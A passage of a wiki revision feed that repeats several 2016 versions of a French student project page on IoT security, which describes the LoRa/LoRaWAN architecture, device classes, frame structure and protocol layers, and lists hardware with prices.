* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35186</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35186"/>
				<updated>2016-11-16T11:25:50Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Matériel */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35063</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35063"/>
				<updated>2016-11-09T13:48:31Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Pile de protocole LoRa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35039</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35039"/>
				<updated>2016-11-08T10:51:06Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Pile de protocole LoRa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comprenant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message.  &lt;br /&gt;
Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application.&lt;br /&gt;
Le Frame Port est aussi utilisé pour déterminer si le message contien seulement des commandes MAC ou des données spéifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
La couche physique commence par un entête MAC suivi d'un&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
